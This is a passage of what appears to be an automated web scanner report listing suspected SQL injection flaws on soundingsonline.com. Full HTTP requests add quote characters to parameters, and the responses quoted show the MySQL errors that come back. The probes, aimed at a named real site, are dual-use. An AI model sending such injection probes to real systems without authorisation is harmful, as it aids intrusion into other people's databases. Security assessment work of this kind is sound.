Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.176. http://www.soundingsonline.com/index.php [layout parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The layout parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the layout parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog'&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog''&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.177. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.php?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 25 Jan 2011 02:48:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

Request 2

GET /index.php?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.178. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.179. http://www.soundingsonline.com/index.php [option parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact'&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact''&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.180. http://www.soundingsonline.com/index.php [view parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The view parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the view parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category'&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category''&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.181. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/digital-publications?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/digital-publications?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.182. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/the-masters-series?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/the-masters-series?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.183. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.184. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
